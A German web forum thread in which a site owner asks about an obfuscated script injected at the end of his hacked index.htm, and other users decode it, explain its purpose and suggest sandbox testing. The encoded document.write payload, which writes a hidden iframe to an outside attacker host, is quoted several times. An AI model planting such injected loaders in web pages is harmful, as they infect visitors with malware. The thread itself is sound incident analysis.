nicht angemeldet
HTML/Crypted.Gen - script am Ende eine HTML-Datei
Hellihello
eben wollte ich zur Bearbeitung Dateien von einem Server herunterladen und bekam für die index.htm von avira die Warnung:
In der Anzeige des Quelltextes finde ich nun ganz am Ende:
<script>document.write(String.fromCharCode(60,105,102,114,97,109,101,32,115,114,99,61,34,104,116,116,112,58,47,47,118,56,52,46,111,114,103,47,105,110,46,99,103,105,63,50,34,32,119,105,100,116,104,61,49,32,104,101,105,103,104,116,61,49,32,115,116,121,108,101,61,34,118,105,115,105,98,105,108,105,116,121,58,32,104,105,100,100,101,110,34,62,60,47,105,102,114,97,109,101,62));</script>
Provider ist greatnet.de.
Dank und Gruß,
-
<script>document.write(String.fromCharCode(60,105,102,114,97,109,101,32,115,114,99,61,34,104,116,116,112,58,47,47,118,56,52,46,111,114,103,47,105,110,46,99,103,105,63,50,34,32,119,105,100,116,104,61,49,32,104,101,105,103,104,116,61,49,32,115,116,121,108,101,61,34,118,105,115,105,98,105,108,105,116,121,58,32,104,105,100,100,101,110,34,62,60,47,105,102,114,97,109,101,62));</script>
pack das mal in deine adresszeile, dann siehst du was dabei rauskommt :)
javascript:alert(String.fromCharCode(60,105,102,114,97,109,101,32,115,114,99,61,34,104,116,116,112,58,47,47,118,56,52,46,111,114,103,47,105,110,46,99,103,105,63,50,34,32,119,105,100,116,104,61,49,32,104,101,105,103,104,116,61,49,32,115,116,121,108,101,61,34,118,105,115,105,98,105,108,105,116,121,58,32,104,105,100,100,101,110,34,62,60,47,105,102,114,97,109,101,62))-
Hellihello
<script>document.write(String.fromCharCode(60,105,102,114,97,109,101,32,115,114,99,61,34,104,116,116,112,58,47,47,118,56,52,46,111,114,103,47,105,110,46,99,103,105,63,50,34,32,119,105,100,116,104,61,49,32,104,101,105,103,104,116,61,49,32,115,116,121,108,101,61,34,118,105,115,105,98,105,108,105,116,121,58,32,104,105,100,100,101,110,34,62,60,47,105,102,114,97,109,101,62));</script>
pack das mal in deine adresszeile, dann siehst du was dabei rauskommt :)
javascript:alert(String.fromCharCode(60,105,102,114,97,109,101,32,115,114,99,61,34,104,116,116,112,58,47,47,118,56,52,46,111,114,103,47,105,110,46,99,103,105,63,50,34,32,119,105,100,116,104,61,49,32,104,101,105,103,104,116,61,49,32,115,116,121,108,101,61,34,118,105,115,105,98,105,108,105,116,121,58,32,104,105,100,100,101,110,34,62,60,47,105,102,114,97,109,101,62))Merci für den Tipp.
der hatte das auch und seine Domain auch bei Greatnet.
Was aber macht "v84 [dot] org [slash] in [dot] cgi?" damit? Die Seite so aufzurufen bringt nischt...;
Dank und Gruß,
-
Was aber macht "v84 [dot] org [slash] in [dot] cgi?" damit? Die Seite so aufzurufen bringt nischt...;
Er weiß durch den Referrer u.a., dass sein Angriff auf deine Domain geklappt hat.
Mathias
-
-
Hi,
pack das mal in deine adresszeile, dann siehst du was dabei rauskommt :)
Sich in einem Mozilla den "generierten Quelltext" anzeigen zu lassen, dürfte einfacher sein. :)
Gruß, Cybaer
--
Man muß viel gelernt haben, um über das, was man nicht weiß, fragen zu können.
(Jean-Jacques Rousseau, Philosoph u. Schriftsteller)
-
Hellihello
Sich in einem Mozilla den "generierten Quelltext" anzeigen zu lassen, dürfte einfacher sein. :)
Aber damit löst man ja auch gleichzeitig den Iframe aus, oder? Naja, wenn man die Seite im Browser offen hat, ists ja eh zu spät, stimmt schon.
Dank und Gruß,
-
Hi,
Aber damit löst man ja auch gleichzeitig den Iframe aus, oder? Naja, wenn man die Seite im Browser offen hat, ists ja eh zu spät, stimmt schon.
Eben. Und FF geht ja noch. die Zielgruppe für so etwas ist meistens (aber nicht immer) einer der IEs.
Generell kann man aber alles mal ausprobieren, solange man nur in einer Sandbox testet (also: virtuellen PC) ...
Gruß, Cybaer
--
Man muß viel gelernt haben, um über das, was man nicht weiß, fragen zu können.
(Jean-Jacques Rousseau, Philosoph u. Schriftsteller)
-
Hellihello
Eben. Und FF geht ja noch. die Zielgruppe für so etwas ist meistens (aber nicht immer) einer der IEs.
Generell kann man aber alles mal ausprobieren, solange man nur in einer Sandbox testet (also: virtuellen PC) ...
Welche Sandbox nimmst Du denn für windows auf Basis von Linux?
Dank und Gruß,
-
Welche Sandbox nimmst Du denn für windows auf Basis von Linux?
ich verwend vmvare für alles - eine mächtige kiste mit massig ram erzeugt mir so einen ganzen brocken virtueller maschinen
wenn eine testmaschine geschrottet wurde: das vhd-file des rohlings rein und weiter gehts :D
-
Hi,
Welche Sandbox nimmst Du denn für windows auf Basis von Linux?
Suns VirtualBox
Gruß, Cybaer
--
Man muß viel gelernt haben, um über das, was man nicht weiß, fragen zu können.
(Jean-Jacques Rousseau, Philosoph u. Schriftsteller)
-
-
-
-
-
-
Hi,
eben wollte ich zur Bearbeitung Dateien von einem Server herunterladen und bekam für die index.htm von avira die Warnung:
Dann wurde wohl deine Website gehackt.
In der Anzeige des Quelltextes finde ich nun ganz am Ende:
Zwar wurde die Website des bösen Buben, auf der sicherlich versucht wurde, den eigentlichen Schadcode an den Mann zu bringen, bereits vvom Netz genommen, aber prinzipiell gilt so etwas, wie ich bereits hier schrieb (bei dir ist es aber wohl keine Scareware, sondern wahrscheinlich normale Maleware wie Trojaner, etc., die über einen Exploit deine Ssurfer infizieren sollte).
Gefahr droht von deiner Website also nicht mehr.
Aber Du solltest dafür sorgen, daß deine Website die Lücke (besser: gleich alle Lücken ;->) abdichtet, über die er eingedrungen ist.
Wenn Du PHP o.s.ä. verwendest, liegt dafür wohl die Verantwortung eher bei dir. Wenn es eine reine HTML-Website ist, wohl eher beim Provider - sofern Du mit deinen Zugangsdaten sorgsam umgegangen bist ...
Gruß, Cybaer
--
Man muß viel gelernt haben, um über das, was man nicht weiß, fragen zu können.
(Jean-Jacques Rousseau, Philosoph u. Schriftsteller)
-
Hellihello
Wenn Du PHP o.s.ä. verwendest, liegt dafür wohl die Verantwortung eher bei dir. Wenn es eine reine HTML-Website ist, wohl eher beim Provider - sofern Du mit deinen Zugangsdaten sorgsam umgegangen bist ...
Eigentlich beides ja. PHP-Skripte gibts nicht (hat der Webspace glaub ich garnicht) und das FTP-Passwort besteht aus 8 Zeichen gemixed, allerdings das vom Provider vorgegebene.
Da ich u.g. ja einen weiteren fand, der im August bei Greatnet das selbe Problem hatte, liegt/lag ja vielleicht doch ein Server-Hack vor?
Dank und Gruß,
-
Hi,
Da ich u.g. ja einen weiteren fand, der im August bei Greatnet das selbe Problem hatte, liegt/lag ja vielleicht doch ein Server-Hack vor?
Sehr wahrscheinlich.
Gruß, Cybaer
--
Man muß viel gelernt haben, um über das, was man nicht weiß, fragen zu können.
(Jean-Jacques Rousseau, Philosoph u. Schriftsteller)
-
-
-
Hellihello
jetzt bringt er mir bei Aufrufen der Forumsseiten immer:
in
C:\Programme\K-Meleon...\prefs-1.js
Enthält Erkennungsmuster des HTML-Scriptvirus HTML/Crypted.Gen
Ich sach ihm immer, er solls löschen, aber es kommt immer wieder. Und nur hier im Forum. Mein Benutzerdefiniertes JS habe ich schon ausgebaut zum Testen. ... ???
Dank und Gruß,